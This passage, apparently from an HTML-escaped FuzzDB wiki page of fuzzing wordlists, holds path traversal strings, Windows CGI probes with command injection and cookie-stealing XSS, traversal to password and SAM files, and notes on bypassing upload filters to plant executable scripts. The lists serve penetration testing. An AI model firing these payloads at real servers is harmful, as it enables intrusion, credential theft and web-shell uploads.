\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
